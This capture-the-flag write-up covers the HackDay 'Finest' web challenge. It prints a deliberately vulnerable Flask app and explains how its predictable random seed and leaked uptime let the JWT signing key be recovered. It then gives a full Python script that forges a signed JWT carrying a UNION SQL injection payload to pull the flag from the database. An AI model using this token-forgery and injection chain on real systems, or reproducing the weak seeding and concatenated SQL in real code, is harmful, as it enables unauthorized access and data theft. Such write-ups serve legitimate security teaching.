HackDay - Finest

HackDay - Finest
  1. Introduction
  2. Enumeration
  3. Exploitation

Introduction

Description

You’ve been informed that a website might be serving as a front for a large criminal network. Part of their revenue supposedly comes from selling cookies that can make you float like an airship… A rather tempting proposition. Their slogan, it seems, is: “Always wondered how to get the coolest and the highest quality products in your region ? Search no more, this new website allows you to do so !”

Enumeration

Reading source code

app.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
from flask import Flask, render_template, request, jsonify, redirect, url_for, make_response
from flask_sqlalchemy import SQLAlchemy
from sqlalchemy import text
from flask_jwt_extended import JWTManager, create_access_token, jwt_required, get_jwt_identity, set_access_cookies, unset_jwt_cookies, get_jwt
from werkzeug.security import generate_password_hash, check_password_hash
import os, time, random, string, math

# I saw in the official _randommodule.c in which both time and pid are used to seed the random generator
# So that must be a good idea, right ? :) Just gonna do it simpler here, but should be as safe.

up = math.floor(time.time())
random.seed(up + os.getpid())

app = Flask(__name__)
app.config['SECRET_KEY'] = "".join(random.choice(string.printable) for _ in range(32))
app.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:////app/data/site.db'
app.config['JWT_SECRET_KEY'] = "".join(random.choice(string.printable) for _ in range(32))
app.config['JWT_TOKEN_LOCATION'] = ['cookies']
app.config['JWT_COOKIE_CSRF_PROTECT'] = False 

db = SQLAlchemy(app)
jwt = JWTManager(app)

class User(db.Model):
    id = db.Column(db.Integer, primary_key=True)
    username = db.Column(db.String(20), unique=True, nullable=False)
    password = db.Column(db.String(60), nullable=False)

class Product(db.Model):
    id = db.Column(db.Integer, primary_key=True)
    name = db.Column(db.String(100), nullable=False)
    description = db.Column(db.Text, nullable=False)
    price = db.Column(db.Float, nullable=False)
    image = db.Column(db.String(20), nullable=False, default='static/images/default.png')
    published = db.Column(db.Boolean, default=True)

class Flag(db.Model):
    id = db.Column(db.Integer, primary_key=True)
    flag = db.Column(db.String(100), nullable=False)

@app.route('/')
def home():
    products = Product.query.filter_by(published=True).all()
    return render_template('home.html', products=products)

@app.route('/product/<int:product_id>')
def product(product_id):
    product = Product.query.get_or_404(product_id)
    if not product.published:
        return render_template('product.html', error="Product not available anymore")

    return render_template('product.html', product=product)

@app.route('/login', methods=['GET', 'POST'])
def login():
    if request.method == 'POST':
        username = request.form['username']
        password = request.form['password']
        user = User.query.filter_by(username=username).first()
        if user and check_password_hash(user.password, password):
            access_token = create_access_token(identity=username, additional_claims={'favorite_product': None})
            resp = make_response(redirect(url_for('home')))
            set_access_cookies(resp, access_token)
            return resp
        else:
            return render_template('login.html', error="Username or password incorrect")
    return render_template('login.html')

@app.route('/logout')
def logout():
    resp = make_response(redirect(url_for('home')))
    unset_jwt_cookies(resp)
    return resp

@app.route('/register', methods=['GET', 'POST'])
def register():
    if request.method == 'POST':
        username = request.form['username']
        password = request.form['password']
        existing_user = User.query.filter_by(username=username).first()
        if existing_user:
            return render_template('register.html', error="Username already taken")
        hashed_password = generate_password_hash(password)
        new_user = User(username=username, password=hashed_password)
        db.session.add(new_user)
        db.session.commit()
        return redirect(url_for('login'))
    return render_template('register.html')

@app.route('/preferences', methods=['GET', 'POST'])
@jwt_required()
def preferences():
    claims = get_jwt()
    current_user = get_jwt_identity()
    if request.method == 'POST':
        favorite_product_id = int(request.form['favorite_product'])
        product = Product.query.get(favorite_product_id)
        if not product:
            return render_template('preferences.html', error="Product does not exist", products=Product.query.all(), current_user=current_user)
        new_token = create_access_token(identity=get_jwt_identity(), additional_claims={'favorite_product': favorite_product_id})
        resp = make_response(redirect(url_for('home')))
        set_access_cookies(resp, new_token)
        return resp
    products = Product.query.all()
    return render_template('preferences.html', products=products, favorite_product=claims.get('favorite_product'), current_user=current_user)

@app.route('/favorite_product_info')
@jwt_required()
def favorite_product_info():
    claims = get_jwt()
    favorite_product_id = claims.get('favorite_product')
    if favorite_product_id:
        favorite_product = Product.query.get(favorite_product_id)
        try:
            favorite_product = db.session.execute(text("SELECT * FROM product WHERE id = " + str(favorite_product_id))).fetchone()
        except Exception as e:
            return render_template('favorite_product_info.html', product=None, error=e)
        return render_template('favorite_product_info.html', product=favorite_product)

    return render_template('favorite_product_info.html', product=None)

@app.route('/check_auth')
@jwt_required(optional=True)
def check_auth():
    claims = get_jwt()
    return jsonify(logged_in=get_jwt_identity() is not None, favorite_product=claims.get('favorite_product')), 200

@app.route("/healthz")
def healthz():
    return jsonify(status="OK", uptime=time.time() - up)

def create_data():
    # clear all Product db
    db.session.query(Product).delete()
    
    product1 = Product(name=f'Space Cookie', description='Cookies so delicate, they might just break! No need for brute force, one bite and they’ll melt right into your hands.', price=random.randrange(10, 100))
    product2 = Product(name='Syringe', description='To, hum, inject yourself with medicine I guess ?', price=random.randrange(10, 100))
    product3 = Product(name='Cool looking leaf', description='To add a nice scent to your house :)', price=random.randrange(10, 100))
    with open("flag.txt","r") as f:
        flag = Flag(flag=f.read().strip())
    db.session.add(product1)
    db.session.add(product2)
    db.session.add(product3)
    db.session.add(flag)
    db.session.commit()

if __name__ == '__main__':
    with app.app_context():
        db.create_all()
        create_data()
    app.run(host="0.0.0.0", port=5000)

There are several vulnerabilities in this code !

JWT Secret Key

The JWT secret key is generated as follows:

1
2
3
4
5
up = math.floor(time.time())
random.seed(up + os.getpid())

app.config['SECRET_KEY'] = "".join(random.choice(string.printable) for _ in range(32))
app.config['JWT_SECRET_KEY'] = "".join(random.choice(string.printable) for _ in range(32))

The main problem here is that we can harvest the pseudo-random value used to seed random, thus enabling us to regenerate the JWT secret key.

  • os.getpid(): if the webapp is running in a docker container, PID = 1
  • up: there is a /healthz endpoint that leaks the uptime of the webapp

index

With this secret key, we should be able to sign any JWT token that we want.

SQL Injection

1
2
3
4
5
6
7
8
9
10
11
12
13
14
@app.route('/favorite_product_info')
@jwt_required()
def favorite_product_info():
    claims = get_jwt()
    favorite_product_id = claims.get('favorite_product')
    if favorite_product_id:
        favorite_product = Product.query.get(favorite_product_id)
        try:
            favorite_product = db.session.execute(text("SELECT * FROM product WHERE id = " + str(favorite_product_id))).fetchone()
        except Exception as e:
            return render_template('favorite_product_info.html', product=None, error=e)
        return render_template('favorite_product_info.html', product=favorite_product)

    return render_template('favorite_product_info.html', product=None)

The favorite_product_id taken from the JWT is NOT subject to any validation/sanitization, and is directly passed to the db.session.execute function, without beign “prepared”.

Developers could cause: “it comes from a JWT that is signed, so it’s safe”.

But in this case, we’re able to generate and sign any JWT we want, enabling us to put any SQL payload that we wan’t here ! So know we have a SQL injection.

Exploitation

Understanding the JWT

First we need to create an account:

index Registering

index Login

Let’s get our JWT: right-click, inspect -> storage, and inspect it to try to replicate it:

1
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJmcmVzaCI6ZmFsc2UsImlhdCI6MTczNzkzNDI1NCwianRpIjoiMTcyNWE3YTAtZTk4OS00ZjZlLWIxNGMtZmIxMTI4MDNhMDZkIiwidHlwZSI6ImFjY2VzcyIsInN1YiI6InRlc3QiLCJuYmYiOjE3Mzc5MzQyNTQsImV4cCI6MTczNzkzNTE1NCwiZmF2b3JpdGVfcHJvZHVjdCI6bnVsbH0.kR_Ldv4MyQ-44zct8y5m7d893p_epYU8LA1DhhNYCDY

index

Time to script !

Scripting

I wrote this simple python script to:

  • Determine the JWT_SECRET_KEY
  • Generate a JWT token with the SQL payload
  • Sign it
  • Displays it on the screen
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
from requests import Session
from time import time, sleep
from math import floor
import random
import string
import uuid

# PyJWT
import jwt

URL = "http://challenges.hackday.fr:58990/"
SESSION = Session()

# Login using our credentials (test:test)
def login():
	t = SESSION.post(URL+"/login", data={
		"username": "test",
		"password": "test",
		"submit": "true",
	})

	if(not SESSION.get(URL+"/check_auth").json()["logged_in"]):
		exit()

# Regenerate the `up` value (= server uptime)
# by getting informations from the /healthz endpont
def get_time():
	server_uptime = SESSION.get(URL+"/healthz").json()["uptime"]

	server_uptime = floor(server_uptime)
	current_time = floor(time())

	return current_time - server_uptime


def sign_jwt(secret_key):
	payload = {
		"fresh": False,            # Not important
		"iat": int(time()),        # Issue date
		"jti": str(uuid.uuid4()),  # Unique JWT ID
		"type": "access",          # Not important
		"sub": "test",             # Our username
		"nbf": int(time())-100,    # JWT is NOT valid BEFORE this date
		"exp": int(time())+2000,   # JWT expires AFTER this date 
        
        # I use a simple UNION query to get the flag
		"favorite_product": "4 UNION SELECT null,null,null,flag,null,null FROM flag;" 
	}

    # Sign the JWT using the server's secret key
	token = jwt.encode(payload, secret_key, algorithm="HS256")
	return token


if __name__ == "__main__":
	login()
	print("[+] Logged in")


	print("[*] Calculating server uptime date and PID")
	time_start = get_time()

	print(f"\t{time_start}")
	print(f"\t1\n")
	print(f'[>] time_start="{time_start}" pid="1"')
	print(f"[*] Gathering server's seed\n")
    
    # Seeding randpm with servers parameters 
	random.seed(time_start + 1)
    #                        ^ os.getpid() = 1

    # In a realistic scenario, we could also do some damage with the flask secret key
	flask_secret_key = "".join(random.choice(string.printable) for _ in range(32))

    # Generate the jwt_secret key
	jwt_secret_key = "".join(random.choice(string.printable) for _ in range(32))
    jwt = sign_jwt(jwt_secret_key)
	
    print("[+] Generated JWT key:")
	print(f"\t{jwt_secret_key}")
	print("[+] Generated JWT token:")
	print(f"\t{jwt}")

Let’s run it: index We’ve generated a signed JWT !

1
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJmcmVzaCI6ZmFsc2UsImlhdCI6MTczNzkzNDMyOSwianRpIjoiMGZhMGRjNjgtMDU2Mi00YWMyLTg5NzEtZDA1Mzg1NmRmNGFiIiwidHlwZSI6ImFjY2VzcyIsInN1YiI6InRlc3QiLCJuYmYiOjE3Mzc5MzQyMjksImV4cCI6MTczNzkzNjMyOSwiZmF2b3JpdGVfcHJvZHVjdCI6IjQgVU5JT04gU0VMRUNUIG51bGwsIG51bGwsbnVsbCxmbGFnLG51bGwsbnVsbCBGUk9NIGZsYWc7In0._rU1aPd0-okBSdCoamyqW9pntOma_nx7nt4E4onLBEY

Getting flag

Finally, we can use this cookie to get the flag.

To do so: right-click, inspect -> storage. Paste the Generated JWT in here, then go to /favorite_product_info (the SQLi vulnerable endpoint): index

1
HACKDAY{Th4t_s_S0m3_g000000000000d_qu4lity!}
This post is licensed under CC BY 4.0 by the author.